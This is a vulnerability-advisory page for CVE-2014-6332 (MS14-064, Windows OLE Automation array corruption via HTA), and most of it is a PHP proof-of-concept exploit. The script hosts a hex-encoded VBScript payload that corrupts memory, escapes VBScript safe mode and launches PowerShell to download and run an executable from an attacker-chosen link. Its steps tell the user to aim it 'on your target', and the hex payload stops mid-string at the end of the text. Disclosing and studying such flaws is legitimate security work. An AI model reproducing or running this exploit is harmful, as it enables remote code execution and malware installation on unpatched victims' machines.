MS HTA (HTML Application) - Code Execution (MS14-064) vulnerability in Microsoft Window
Reporter | Title | Published | Views | Family All 87 |
---|---|---|---|---|
seebug.org | IE Godmode remote code execution vulnerability, CVE-2014-6332) | 6 Mar 201700:00 | – | seebug |
seebug.org | IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution | 31 Aug 201500:00 | – | seebug |
FireEye | GongDa vs. Korean News | 18 Mar 201608:30 | – | fireeye |
FireEye | Threat actors leverage EternalBlue exploit to deliver non-WannaCry payloads | 2 Jun 201709:00 | – | fireeye |
FireEye | Threat actors leverage EternalBlue exploit to deliver non-WannaCry payloads | 2 Jun 201709:00 | – | fireeye |
FireEye | GongDa vs. Korean News | 18 Mar 201612:30 | – | fireeye |
FireEye | Threat actors leverage EternalBlue exploit to deliver non-WannaCry payloads | 2 Jun 201713:00 | – | fireeye |
FireEye | PowerShell used for spreading Trojan.Laziok through Google Docs | 21 Apr 201617:45 | – | fireeye |
FireEye | PowerShell used for spreading Trojan.Laziok through Google Docs | 21 Apr 201613:45 | – | fireeye |
FireEye | Cybercrime News Results In Cybercrime Blues | 9 Dec 201512:00 | – | fireeye |
Document Title:
===============
MS HTA (HTML Application) - Code Execution (MS14-064)
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1576
Video: http://youtu.be/Vkswz7vt23M
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332
CVE-ID:
=======
CVE-2014-6332
Release Date:
=============
2015-08-15
Vulnerability Laboratory ID (VL-ID):
====================================
1576
Common Vulnerability Scoring System:
====================================
9.3
Abstract Advisory Information:
==============================
The Vulnerability Laboratory discovered remote code execution vulnerability in the Microsoft HTA (HTML Application) - MS14-064.
Vulnerability Disclosure Timeline:
==================================
2015-08-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1,
Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by
an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka Windows OLE Automation
Array Remote Code Execution Vulnerability.
Proof of Concept (PoC):
=======================
The vulnerbility can be exploited by remote attackers without user interaction or privilege application user accounts.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce ...
1 . Run php code : php hta.php
2 . Copy this php output (HTML) and Paste as poc.hta (Replace ip)
3 . Open poc.hta
4 . Your Link Download/Execute on your target
5 . Finished ;)
#!/usr/bin/php
<?php
# Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution
# Tested on Windows 7 / Server 2008
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#
# MS14-064
#
#
# 1 . run php code : php hta.php
# 2 . copy this php output (HTML) and Paste as poc.hta (Replace ip)
# 3 . open poc.hta
# 4 . Your Link Download/Execute on your target
# 5 . Finished ;)
#
# Demo : http://youtu.be/Vkswz7vt23M
#
$port=80; # Port Address
$link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link
print " Mohammad Reza Espargham\n\n\n";
$host= gethostname(); #g3th0stn4m3
$ip = gethostbyname($host); #g3th0stbyn4m3
print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n";
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($reza, 0,$port);
socket_listen($reza);
$msgd =
"\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76".
"\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65".
"\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68".
"\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20".
"\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63".
"\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75".
"\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20".
"\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62".
"\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22".
"\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65".
"\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65".
"\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61".
"\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c".
"\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d".
"\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53".
"\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b".
"\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70".
"\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e".
"\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61".
"\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73".
"\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55".
"\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d".
"\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d".
"\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61".
"\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78".
"\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20".
"\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a".
"\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28".
"\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a".
"\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a".
"\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65".
"\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".
"\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20".
"\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69".
"\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".
"\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e".
"\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20".
"\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65".
"\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f".
"\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65".
"\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a".
"\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61".
"\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".
"\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68".
"\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30".
"\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72".
"\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".
"\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68".
"\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28".
"\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f".
"\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75".
"\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69".
"\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e".
"\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29".
"\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d".
"\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69".
"\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f".
"\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a".
"\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33".
"\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e".
"\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66".
"\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45".
"\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20".
"\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72".
"\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76".
"\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43".
"\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20".
"\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74".
"\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74".
"\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e".
"\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45".
"\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69".
"\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20".
"\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32".
"\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a".
"\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30".
"\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d".
"\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61".
"\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34".
"\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61".
"\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50".
"\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75".
"\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20".
"\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e".
"\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20".
"\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28".
"\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20".
"\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20".
"\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d".
"\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b".
"\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e".
"\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64".
"\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28".
"\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20".
"\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68".
"\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20".
"\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37".
"\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75".
"\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d".
"\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20".
"\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20".
"\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33".
"\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30".
"\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20".
"\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20".
"\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30".
"\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20".
"\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65".
"\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74".
"\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34".
"\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38".
"\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28".
"\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d".
"\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29".
"\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69".
"\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61".
"\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28".
"\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29".
"\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66".
"\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20".
"\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d".
"\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74".
"\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65".
"\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20".
"\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20".
"\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20".
"\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69".
"\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20".
"\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46".
"\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28".
"\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20".
"\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65".
"\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49".
"\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72".
"\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a".
"\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65".
"\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45".
